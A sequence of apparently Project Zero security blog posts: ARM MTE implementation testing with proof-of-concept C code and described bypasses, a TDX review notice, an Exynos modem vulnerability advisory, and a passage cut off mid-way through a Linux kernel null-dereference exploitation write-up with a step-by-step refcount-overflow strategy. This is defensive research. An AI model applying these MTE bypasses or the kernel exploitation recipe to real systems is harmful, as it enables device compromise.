Part 3 continues this series with a more detailed discussion of the specifics of applying MTE to the kernel, which has some additional nuance (and may still contain some information of interest even if you're only interested in user-space applications). 

[1] A hard mitigation that does not provide deterministic protection, but which can be universally bypassed by the attacker "winning" a probabilistic condition, in the case of MTE (with 4 tag bits available, likely with one value reserved) this would probably imply a 1/15 chance of success.

[2] A hard mitigation that does provide deterministic protection.

MTE As Implemented, Part 1: Implementation Testing

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

Through mid-2022 and early 2023, Project Zero had access to pre-production hardware implementing this instruction set extension to evaluate the security properties of the implementation. In particular, we're interested in whether it's possible to use this instruction set extension to implement effective security mitigations, or whether its use is limited to debugging/fault detection purposes.

As of the v8.5a specification, MTE can operate in two distinct modes, which are switched between on a per-thread basis. The first mode is sync-MTE, where tag-check failure on a memory access will cause the instruction performing the access to deliver a fault at retirement. The second mode is async-MTE, where tag-check failure does not directly (at the architectural level) cause a fault. Instead, tag-check failure will cause the setting of a per-core flag, which can then be polled from the kernel context to detect when an invalid access has occurred.

This blog post documents the tests that we have performed so far, and the conclusions that we've drawn from them, together with the code necessary to repeat these tests. This testing was intended to explore both the details of the hardware implementation of MTE, and the current state of the software support for MTE in the Linux kernel. All of the testing is based on manually implemented tagging in statically-linked standalone binaries, so it should be easy to reproduce these results on any compatible hardware.

Terminology

When designing and implementing security features, it's important to be conscious of the specific protection goal. In order to provide clarity in the rest of this post, we'll define some specific terminology that we use when talking about this:

  1. Mitigation - A mitigation is something that reduces real exploitability of a vulnerability or class of vulnerability. The expectation is that attackers can (and eventually will) find their way around it. Examples would be DEP, ASLR, CFI.
  1. "Soft" Mitigation - We consider a mitigation to be "soft" if the expectation is that an attacker pays a one-time cost in order to bypass the mitigation. Typically this would be a per-target cost, for example developing a ROP chain to bypass DEP, which can usually be largely re-used between different exploits for the same target software.
  2. "Hard" Mitigation - We consider a mitigation to be "hard" if the expectation is that an attacker cannot develop a bypass technique which is reusable between different vulnerabilities (without, e.g. incorporating an additional vulnerability). An example would be ASLR, which is typically bypassed either by the use of a separate information leak vulnerability, or by developing an information leak primitive using the same vulnerability.

Note that the context can have an impact on the "hardness" of a mitigation -
        if a codebase is particularly rich in code-patterns which allow the construction of

information leaks, it's quite possible that an attacker can develop a reliable, reusable

technique for turning various memory corruption primitives into an information leak

within that codebase.

  1. Solution - a solution is something that eliminates exploitability of a vulnerability or class of vulnerability. The expectation is that the only way for an attacker to bypass a solution would be an unintended implementation weakness in the solution.

For example (based purely on a theoretical implementation of memory tagging):

 - Randomly-allocating tags to heap allocations cannot be considered a solution for any class of heap-related memory corruption, since this provides at best probabilistic protection.

 - Allocating odd and even tags to adjacent heap allocations might theoretically be able to provide a solution for linear heap-buffer overflows.

Hardware Implementation

The main hardware implementation question we had was, does a speculative side-channel exist that would allow leaking whether or not a tag-check has succeeded, without needing to architecturally execute the tag-check?

It is expected that Spectre-type speculative execution side-channels will still allow an attacker to leak pointer values from memory, indirectly leaking the tags. Here we consider whether the implementation introduces additional speculative side-channels that would allow an attacker to more efficiently leak tag-check success/failure.

TL; DR; In our testing we did not identify an additional1 speculative side-channel that would allow such an attack to be performed.

1. Does MTE block Spectre? (NO)

The only way that MTE could prevent exploitation of Spectre-type weaknesses would be to have speculative execution stall the pipeline until the tag-check completes2. This might sound desirable ("prevent exploitation of Spectre-type weaknesses") but it's not - this would create a much stronger side-channel to allow an attacker to create an oracle for tag-check success, weakening the overall security properties of the MTE implementation.

This is easy to test. If we can still leak data out of speculative execution using Spectre when the pointer used for the speculative access has an incorrect tag, then this is not the case.

We wrote a small patch to the safeside demo spectre_v1_pht_sa that demonstrates this:

mte_device:/data/local/tmp $ ./spectre_v1_pht_sa_mte

Leaking the string: 1t's a s3kr3t!!!

Done!

Checking that we would crash during architectural access:

Segmentation fault

2. Does tag-check success/failure have a measurable impact on the speculation window length? (Probably NOT)

There is a deeper question that we'd like to understand: is the length of speculative execution after a memory access influenced by whether the tag-check for that access succeeds or fails? If this was the case, then we might be able to build a more complex speculative side-channel that we could use in a similar way.

In order to measure this, we need to force a mis-speculation, and then perform a read access to memory for which a tag-check would either succeed or fail, and then we need to use a speculative side-channel to measure how many further instructions were successfully speculatively executed. We wrote and tested a self-contained harness to measure this, which can be found in
speculation_window.c

This harness works by generating code for a test function with a variable number of no-op instructions at runtime, and then repeatedly executing this test function in a loop to train the branch-predictor before finally triggering mis-speculation. The test function is as follows:

  ldr  x0, [x0]         ; this load is slow (*x0 is uncached)

  cbnz x0, speculation: ; this branch is always taken during warmup

  ret

speculation:

  ldr  x1, [x1]         ; this load is fast (*x1 is cached)

                        ; the tag-check success or fail will happen on

                        ; this access, but during warmup the tag-check

                        ; will always be a success.

  orr  x2, x2, x1       ; this is a no-op (as x1 is always 0) but it

  ... n times ...       ; maintains a data dependency between the

  orr  x2, x2, x1       ; loads (and the no-ops), hopefully preventing

                        ; too much re-ordering.

  ldr  x2, [x2]         ; *x2 is uncached, if it is cached later then

                        ; this instruction was (probably) executed.

  ret


In this way we can measure the number of no-ops that we can insert before the final load no longer executes (ie. the result from the first load is received and we realise that we've mispredicted the branch so we flush the pipeline before the final load is executed).

In order to reduce bias due to branch-predictor behaviour, the test program is run separately for the tag-check success and tag-check failure case, and the control-flow being run is identical in both cases.

In order to reduce bias due to cpu power-management/throttling behaviour, each time the test program is run, it collects a single set of samples and then exits. We then run this program repeatedly, and by interleaving the runs for tag-check success and tag-check fail we look to reduce this influence on the results. In addition, the cores are down-clocked to the lowest supported frequency using the standard linux cpu scaling interface, which should reduce the impact of cpu throttling to a minimum.

Most modern mobile devices also have non-homogenous core designs, with for example a 4+4, 2+2+4 or 1+3+4 core design. Since the device under test is no exception, the program needs to pin itself to a specific core and we need to run these tests for each core design separately.

Reading from the virtual timer is extremely slow (relative to memory access instructions)
, and this results in noisy data when attempting to measure single-cache-hit/single-cache-miss. In a normal real-world environment, a shared-memory timer is often a better approach to timing with this level of granularity, and that's an approach that we've used previously with success. In this case, since we want to get data for each core, it was difficult to get consistency across all cores, and we had better results using an amplification approach performing accesses to multiple cache-lines.

However, this approach adds more complexity to the measuring code, and more possibilities for smart prefetching or similar to interfere with our measurements. Since we are trying to test the properties of the hardware, rather than develop a practical attack that needs to run in a timely fashion, we decided to minimise these risks and instead collect enough data that we'd be able to see the patterns through the noise.

The first graphs below show this data for a region of the x-axis (nop-count) on each core around where the speculation window ends (so the x-axis is anchored differently for each core), and on the y-axis we plot the observed probability that our measurement results in a cache-miss. Two separate lines are plotted in each graph; one in red for the "tag-check-fail" case and one in green for the "tag-check-pass" case. We can't really see the green line at all - the two lines overlap so closely as to be indistinguishable.

If we really zoom in on measurements from the "Biggest" core, we can see the two lines deviating due to the noise:


Another interesting point is to notice that the graph we have for the biggest core tops out at a probability of ~30%; this is (probably) not because we're hitting the cache, but instead that the timer read is slow that we can't use it to reliably differentiate between cache misses and cache hits most of the time. If we look at a graph of raw latency measurements, we can see this:

The important thing is that there's no significant difference between the results for the failure and success cases, which suggests that there's no clear speculative side-channel that would allow an attacker to build a side-channel tag-check oracle directly.

Software Implementation

There are several ways that we identified that the current software implementation around the use of MTE could lead to bypasses if MTE were used as a security mitigation.

As described below,
Issues 1 and 2 are quirks of the current implementation that it may or may not be possible to address with kernel changes. They are both of limited scope and only apply to very specific conditions, so they likely don't have a particularly significant impact on the applicability of MTE as a security mitigation (although they have some implications for the coverage of such a mitigation.)

Issue 3 is a detail of the current implementation of Breakpad, and serves to highlight a particular class of weakness that will require careful audit of signal handling code in any application that wishes to use MTE as a security mitigation.

Issue
4 is a fundamental weakness that likely cannot be effectively addressed. We would not characterize this as meaning that MTE could not be applied as a security mitigation, but rather a limitation on the claims that one could make about the effectiveness of such a mitigation.

To be more specific, both issues 3 and 4 are bound by some fairly significant limitations, which would have varying impact on exploitability of memory corruption issues depending on the specific context in which the issue occurs. See below for more discussion on this topic.

TL;DR; In our testing we identified some areas for improvement on the software side, and demonstrated that it is possible to use the narrow "exploitation window" to avoid the side-effects of tag-check failures under some circumstances, meaning that any mitigation based on async MTE is likely limited to a "soft mitigation" regardless of tagging strategy.

1. Handling of system call arguments [ASYNC]

There's a documented limitation of the current handling of the async MTE check mode in the linux kernel, which is that the kernel does not catch invalid accesses to userspace pointers. This means that kernel-space accesses to incorrectly tagged user-space pointers during a system call will not be detected.

There are likely good technical reasons for this limitation, but we plan to investigate improving this coverage in the future.

We provide a sample that demonstrates this limitation, software_issue_1.c.

mte_enable(false, DEFAULT_TAG_MASK);

uint64_t* ptr = mmap(NULL, 0x1000,

  PROT_READ|PROT_WRITE|PROT_MTE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

uint64_t* tagged_ptr = mte_tag_and_zero(ptr, 0x1000);

memset(tagged_ptr, 0x23, 0x1000);

int fd = open("/dev/urandom", O_RDONLY);

fprintf(stderr, "%p %p\n", ptr, tagged_ptr);

read(fd, ptr, 0x1000);

assert(*tagged_ptr == 0x2323232323232323ull);

taro:/ $ /data/local/tmp/software_issue_1                                                                                                                  

0x7722c5d000 0x800007722c5d000

software_issue_1: ./software_issue_1.c:46: int main(int, char **): Assertion `*tagged_ptr == 0x2323232323232323ull' failed.

2. Handling of system call arguments [SYNC]

The way that the sync MTE check mode is currently implemented in the linux kernel means that kernel-space accesses to incorrectly tagged user-space pointers result in the system call returning EFAULT. While this is probably the cleanest and simplest approach, and is consistent with current kernel behaviour especially when it comes to handling results for partial operations, this has the potential to lead to bypasses/oracles in some circumstances.

We plan to investigate replacing this behaviour with SIGSEGV delivery instead (specifically for MTE tag check failures).

The provided sample, software_issue_2.c is a very simple demonstration of this situation.

size_t readn(int fd, void* ptr, size_t len) {

  char* start_ptr = ptr;

  char* read_ptr = ptr;

  while (read_ptr < start_ptr + len) {

    ssize_t result = read(fd, read_ptr, start_ptr + len - read_ptr);

    if (result <= 0) {

      return read_ptr - start_ptr;

    } else {

      read_ptr += result;

    }

  }

  return len;

}

int main(int argc, char** argv) {

  int pipefd[2];

  mte_enable(true, DEFAULT_TAG_MASK);

  uint64_t* ptr = mmap(NULL, 0x1000,

    PROT_READ|PROT_WRITE|PROT_MTE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);

  ptr = mte_tag(ptr, 0x10);

  strcpy(ptr, "AAAAAAAAAAAAAAA");

  assert(!pipe(pipefd));

  write(pipefd[1], "BBBBBBBBBBBBBBB", 0x10);

  // In sync MTE mode, kernel MTE tag-check failures cause system calls to fail

  // with EFAULT rather than triggering a SIGSEGV. Existing code doesn't

  // generally expect to receive EFAULT, and is very unlikely to handle it as a

  // critical error.

  uint64_t* new_ptr = ptr;

  while (!strcmp(new_ptr, "AAAAAAAAAAAAAAA")) {

    // Simulate a use-after-free, where new_ptr is repeatedly free'd and ptr

    // is accessed after the free via a syscall.

    new_ptr = mte_tag(new_ptr, 0x10);

    strcpy(new_ptr, "AAAAAAAAAAAAAAA");

    size_t bytes_read = readn(pipefd[0], ptr, 0x10);

    fprintf(stderr, "read %zu bytes\nnew_ptr string is %s\n", bytes_read, new_ptr);

  }

}

taro:/ $ /data/local/tmp/software_issue_2                                                                                                          

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 0 bytes

new_ptr string is AAAAAAAAAAAAAAA

read 16 bytes

new_ptr string is BBBBBBBBBBBBBBB

3. New dangers in signal handlers [ASYNC].

Since SIGSEGV is a catchable signal, any signal handlers that can handle SIGSEGV become a critical attack surface for async MTE bypasses. Breakpad/Crashpad at present have a signal handler (ie, installed in all Chrome processes) which allows a trivial same-thread bypass for async MTE as a security protection, which is demonstrated in async_bypass_signal_handler.c / async_bypass_signal_handler.js.

The concept is simple - if we can corrupt any state that would result in the signal handler concluding that a SIGSEGV coming from a tag-check failure is handled/safe, then we can effectively disable MTE for the process.

If we look at the current breakpad signal handler (the crashpad signal handler has the same design):

void ExceptionHandler::SignalHandler(int sig, siginfo_t* info, void* uc) {

  // Give the first chance handler a chance to recover from this signal

  //

  // This is primarily used by V8. V8 uses guard regions to guarantee memory

  // safety in WebAssembly. This means some signals might be expected if they

  // originate from Wasm code while accessing the guard region. We give V8 the

  // chance to handle and recover from these signals first.

  if (g_first_chance_handler_ != nullptr &&

      g_first_chance_handler_(sig, info, uc)) {

    return;

  }

It's clear that if our exploit could patch g_first_chance_handler_ to point to any function that will return a non-zero value, then this will mean that tag-check failures are no longer caught.

The example we've provided in async_signal_handler_bypass.c and async_signal_handler_bypass.js demonstrates an exploit using this technique against a simulated bug in the duktape javascript interpreter.

taro:/data/local/tmp $./async_bypass_signal_handler ./async_bypass_signal_handler.js                                                                      

offsets: 0x26c068 0x36bc80

starting script execution

access

segv handler 11

Async MTE has been bypassed [0.075927734375ms]

done

It seems hard to imagine designing a signal handler that will be robust against all possible attacks here, as most data that is accessed by the signal handler will now need to be treated as untrusted. It's our understanding that Android is considering making changes to the way that the kernel handles these failures to guarantee delivery of these errors to an out-of-process handler, preventing this kind of bypass.

4. Generic bypass in multi-threaded environments [ASYNC].

Since async MTE failures are only delivered when the thread which caused the error enters the kernel, there's a slightly more involved (but more generic) bypass available in multi-threaded environments. If we can coerce another thread into performing our next exploit steps for us, then we can bypass the protection this way.

The example we've provided in async_thread_bypass.c and async_thread_bypass.js demonstrates an exploit using this technique against a simulated bug in the duktape javascript interpreter.

taro:/data/local/tmp $ ./async_bypass_thread ./async_bypass_thread.js                                                                                      

thread is running

Async MTE bypassed!

Note that in practice, the technique here would most likely be to have the coerced thread simply install a new signal handler to effectively reimplement 3. above, but the example invokes a shell command as a demonstration.

How wide are these windows?

So, we've identified two methods by which a compromised thread might avoid the consequences of performing invalid accesses. This was a known and expected limitation of async-MTE-as-a-security-mitigation — but how significant is this?

In the existing (linux) kernel implementation, an outstanding async-MTE failure is delivered as a SIGSEGV when the thread that performed the faulting access transitions to kernel mode. This means that the user-to-kernel transition can be thought of as a synchronisation barrier for tag-check failures.

This leads us to our first rule for async-MTE-safe exploitation:

  1. We need to complete our exploit (or disable async-MTE) without needing to make a system call from the faulting thread.

This will already pose a significant limitation in some contexts - for example, many network services will have a `read/write` loop in between commands, so this would mean that the exploit must be completed within the execution of a single command. However, for many other contexts, this is less of an issue - a vulnerability in a complex file format parser, decompression algorithm or scripting engine will likely provide sufficient control between system calls to complete an exploit (as demonstrated above with the duktape javascript engine).

There is then a second requirement that the exploit-writer needs to bear in mind, which is the periodic timer interrupt. In the kernel configuration tested, this was set to `CONFIG_HZ_250`, so we can expect a timer interrupt every 4ms, leading us to our second rule3:

  1. We need to complete our exploit in  ~0.2 ms if we want to get acceptable (95%4) reliability. (+0.01ms exploit runtime => -0.25% reliability)

Part 2 continues with a higher-level analysis of the effectiveness of various different MTE configurations in a variety of user-space application contexts, and what type of impact we'd expect to see on attacker cost.

[1] It is known/expected that Spectre-type attacks are possible to leak pointer values from memory.

[2] ARM indicated that this should not be the case (this potential weakness was raised with them early in the MTE design process).

[3] This assumes that the attacker can't construct a side-channel allowing them to determine when a timer interrupt has happened in the target process, which seems like a reasonable assumption in a remote media-parsing scenario, but less so in the context of a local privilege elevation.

[4] 95% is a rough estimate - part 2 discusses the reasoning here in more detail; but note that we would consider this a rough reference point for what attackers will likely work towards, and not a hard limit.

Summary: MTE As Implemented

2 August 2023 at 16:30

By Mark Brand, Project Zero

In mid-2022, Project Zero was provided with access to pre-production hardware implementing the ARM MTE specification. This blog post series is based on that review, and includes general conclusions about the effectiveness of MTE as implemented, specifically in the context of preventing the exploitation of memory-safety vulnerabilities.

Despite its limitations, MTE is still by far the most promising path forward for improving C/C++ software security in 2023. The ability of MTE to detect memory corruption exploitation at the first dangerous access provides a significant improvement in diagnostic and potential security effectiveness. In comparison, most other proposed approaches rely on blocking later stages in the exploitation process, for example various hardware-assisted CFI approaches which aim to block invalid control-flow transfers.

No MTE-based mitigation is going to completely solve the problem of exploitable C/C++ memory safety issues. The unfortunate reality of speculative side-channel attacks is that MTE will not end memory corruption exploitation. However, there are no other practical proposals with a similarly broad impact on exploitability (and exploitation cost) of such a wide range of memory corruption issues which would additionally address this limitation.

Furthermore, given the long history of  innovation and research in this space, we believe that it is not possible to build a software solution for C/C++ memory safety with comparable coverage to MTE that has less runtime overhead than AddressSanitizer/HWAsan. It's clear that such an overhead is not acceptable for most production workloads.

Products that expect to contain large C/C++ codebases in the long term, who consider the exploitation of memory corruption vulnerabilities to be a key risk for their product security, should actively drive support for ARM's MTE in their products.

For a more detailed analysis, see the following linked blog posts:

  1. Implementation Testing - An objective summary of the tests performed, and some basic analysis. If you're interested in implementing a mitigation based on MTE, you should read this document first as it will give you more detailed technical background.

  1. Mitigation Case Studies - A subjective assessment of the impact of various mitigation approaches based on the use of MTE in various user-mode contexts, based on our experiences during the tests performed in Part 1. If you're not interested in implementing a mitigation based on MTE, but you are interested in the limits of how effective such a mitigation might be, you can skip Part 1 and start here.
  2. The Kernel - A subjective assessment of the additional issues faced in using MTE for a kernel-mode mitigation.

Release of a Technical Report into Intel Trust Domain Extensions

24 April 2023 at 16:27

Today, members of Google Project Zero and Google Cloud are releasing a report on a security review of Intel's Trust Domain Extensions (TDX). TDX is a feature introduced to support Confidential Computing by providing hardware isolation of virtual machine guests at runtime. This isolation is achieved by securing sensitive resources, such as guest physical memory. This restricts what information is exposed to the hosting environment.

The security review was performed in cooperation with Intel engineers on pre-release source code for version 1.0 of the TDX feature. This code is the basis for the TDX implementation which will be shipping in limited SKUs of the 4th Generation Intel Xeon Scalable CPUs.

The result of the review was the discovery of 10 confirmed security vulnerabilities which were fixed before the final release of products with the TDX feature. The final report highlights the most interesting of these issues and provides an overview of the feature's architecture. 5 additional areas were identified for defense-in-depth changes to subsequent versions of TDX.

You can read more details about the review on the Google Cloud security blog and the final report. If you would like to review the source code yourself, Intel has made it available on the TDX website.

Multiple Internet to Baseband Remote Code Execution Vulnerabilities in Exynos Modems

16 March 2023 at 18:07

Posted by Tim Willis, Project Zero

In late 2022 and early 2023, Project Zero reported eighteen 0-day vulnerabilities in Exynos Modems produced by Samsung Semiconductor. The four most severe of these eighteen vulnerabilities (CVE-2023-24033, CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498) allowed for Internet-to-baseband remote code execution. Tests conducted by Project Zero confirm that those four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number. With limited additional research and development, we believe that skilled attackers would be able to quickly create an operational exploit to compromise affected devices silently and remotely.

The fourteen other related vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074, CVE-2023-26075, CVE-2023-26076 and nine other vulnerabilities that are yet to be assigned CVE-IDs) were not as severe, as they require either a malicious mobile network operator or an attacker with local access to the device.

Affected devices

Samsung Semiconductor's advisories provide the list of Exynos chipsets that are affected by these vulnerabilities. Based on information from public websites that map chipsets to devices, affected products likely include:

  • Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series;
  • Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series;
  • The Pixel 6 and Pixel 7 series of devices from Google; and
  • any vehicles that use the Exynos Auto T5123 chipset.

Patch timelines

We expect that patch timelines will vary per manufacturer (for example, affected Pixel devices have received a fix for all four of the severe Internet-to-baseband remote code execution vulnerabilities in the March 2023 security update). In the meantime, users with affected devices can protect themselves from the baseband remote code execution vulnerabilities mentioned in this post by turning off Wi-Fi calling and Voice-over-LTE (VoLTE) in their device settings, although your ability to change this setting can be dependent on your carrier. As always, we encourage end users to update their devices as soon as possible, to ensure that they are running the latest builds that fix both disclosed and undisclosed security vulnerabilities.

Four vulnerabilities being withheld from disclosure

Under our standard disclosure policy, Project Zero discloses security vulnerabilities to the public a set time after reporting them to a software or hardware vendor. In some rare cases where we have assessed attackers would benefit significantly more than defenders if a vulnerability was disclosed, we have made an exception to our policy and delayed disclosure of that vulnerability.

Due to a very rare combination of level of access these vulnerabilities provide and the speed with which we believe a reliable operational exploit could be crafted, we have decided to make a policy exception to delay disclosure for the four vulnerabilities that allow for Internet-to-baseband remote code execution. We will continue our history of transparency by publicly sharing disclosure policy exceptions, and will add these issues to that list once they are all disclosed.

Related vulnerabilities not being withheld

Of the remaining fourteen vulnerabilities, we are disclosing four vulnerabilities (CVE-2023-26072, CVE-2023-26073, CVE-2023-26074 and CVE-2023-26075) that have exceeded Project Zero's standard 90-day deadline today. These issues have been publicly disclosed in our issue tracker, as they do not meet the high standard to be withheld from disclosure. The remaining ten vulnerabilities in this set have not yet hit their 90-day deadline, but will be publicly disclosed at that point if they are still unfixed.

Changelog

2023-03-21: Removed note at the top of the blog as patches are more widely available for the four severe vulnerabilities. Added additional context that some carriers can control the Wifi calling and VoLTE settings, overriding the ability for some users to change this setting.

2023-03-20: Google Pixel updated their March 2023 Security Bulletin to now show that all four Internet-to-baseband remote code execution vulnerabilities were fixed for Pixel 6 and Pixel 7 in the March 2023 update, not just one of the vulnerabilities, as originally stated.

2023-03-20: Samsung Semiconductor updated their advisories to include three new CVE-IDs, that correspond to the three other Internet-to-baseband remote code execution issues (CVE-2023-26496, CVE-2023-26497 and CVE-2023-26498). The blogpost text was updated to reflect these new CVE-IDs.

2023-03-17: Samsung Semiconductor updated their advisories to remove Exynos W920 as an affected chipset, so we have removed it from the "Affected devices" section.

2023-03-17: Samsung Mobile advised us that the A21s is the correct affected device, not the A21 as originally stated.

2023-03-17: Four of the fourteen less severe vulnerabilities hit their 90-day deadline at the time of publication, not five, as originally stated.

Exploiting null-dereferences in the Linux kernel

19 January 2023 at 17:33

Posted by Seth Jenkins, Project Zero

For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap’ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.

Kernel oops overview

At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops - instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred - however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.

The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.

Reference count mismanagement overview

Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn’t decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important however, that each increment of the refcount allocates little or no physical memory. Even a single byte allocation is quite expensive if it must be performed 232 times.

Example null-deref bug

When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example - an otherwise unrelated bug I coincidentally discovered in the very recent past:

static int show_smaps_rollup(struct seq_file *m, void *v)

{

        struct proc_maps_private *priv = m->private;

        struct mem_size_stats mss;

        struct mm_struct *mm;

        struct vm_area_struct *vma;

        unsigned long last_vma_end = 0;

        int ret = 0;

        priv->task = get_proc_task(priv->inode); //task reference taken

        if (!priv->task)

                return -ESRCH;

        mm = priv->mm; //With no vma's, mm->mmap is NULL

        if (!mm || !mmget_not_zero(mm)) { //mm reference taken

                ret = -ESRCH;

                goto out_put_task;

        }

        memset(&mss, 0, sizeof(mss));

        ret = mmap_read_lock_killable(mm); //mmap read lock taken

        if (ret)

                goto out_put_mm;

        hold_task_mempolicy(priv);

        for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {

                smap_gather_stats(vma, &mss);

                last_vma_end = vma->vm_end;

        }

        show_vma_header_prefix(m, priv->mm->mmap->vm_start,last_vma_end, 0, 0, 0, 0); //the deref of mmap causes a kernel oops here

        seq_pad(m, ' ');

        seq_puts(m, "[rollup]\n");

        __show_smap(m, &mss, true);

        release_task_mempolicy(priv);

        mmap_read_unlock(mm);

out_put_mm:

        mmput(mm);

out_put_task:

        put_task_struct(priv->task);

        priv->task = NULL;

        return ret;

}

This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMA’s mapped at all, the task’s mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply read’ing /proc/[pid]/smaps_rollup on a task with no VMA’s (which itself can be stably created via ptrace):

Kernel log showing the oops condition backtrace

This kernel oops will mean that the following events occur:

  1. The associated struct file will have a refcount leaked if fdget took a refcount (we’ll try and make sure this doesn’t happen later)
  2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
  3. The task struct associated with the smaps_rollup file will have a refcount leaked
  4. The mm_struct’s mm_users refcount associated with the task will be leaked
  5. The mm_struct’s mmap lock will be permanently readlocked (any future write-lock attempts will hang forever)

Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking of events 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t which prevents the overflow condition. This leaves condition 4.


The mm_users refcount still uses an overflow-unsafe atomic_t and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple important roadblocks we need to avoid in order to repeatedly leak this refcount:

  1. We cannot call this syscall from the task with the empty vma list itself - in other words, we can’t call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
  2. We must re-open the smaps_rollup file every time because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex lock which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
  3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks so the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM
  4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn’t difficult, just don’t read the file from a multi-threaded process.

Our final refcount leaking overflow strategy is as follows:

  1. Process A forks a process B
  2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won’t go away (but rather will enter tracing stop)
  3. Proces B clones with CLONE_VM | CLONE_PTRACE another process C
  4. Process B munmap’s its entire virtual memory address space - this also unmaps process C’s virtual memory address space.
  5. Process A forks new children D and E which will access (B|C)’s smaps_rollup file respectively
  6. (D|E) opens (B|C)’s smaps_rollup file and performs a read which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops
  7. Process A goes back to step 5 ~232 times

The above strategy can be rearchitected to run in parallel (across processes not threads, because of roadblock 4) and improve performance. On server setups that print kernel logging to a serial console, generating 232 kernel oopses takes over 2 years. However on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.

Exploitation

Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition:

static inline void __mmput(struct mm_struct *mm)

{

        VM_BUG_ON(atomic_read(&mm->mm_users));

        uprobe_clear_state(mm);

        exit_aio(mm);

        ksm_exit(mm);

        khugepaged_exit(mm);

        exit_mmap(mm);

        mm_put_huge_zero_page(mm);

        set_mm_exe_file(mm, NULL);

        if (!list_empty(&mm->mmlist)) {

                spin_lock(&mmlist_lock);

                list_del(&mm->mmlist);

                spin_unlock(&mmlist_lock);

        }

        if (mm->binfmt)

                module_put(mm->binfmt->module);

        lru_gen_del_mm(mm);

        mmdrop(mm);

}

Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.

However, before the call permanently deadlocks, it will call several other functions:

  1. uprobe_clear_state
  2. exit_aio
  3. ksm_exit
  4. khugepaged_exit

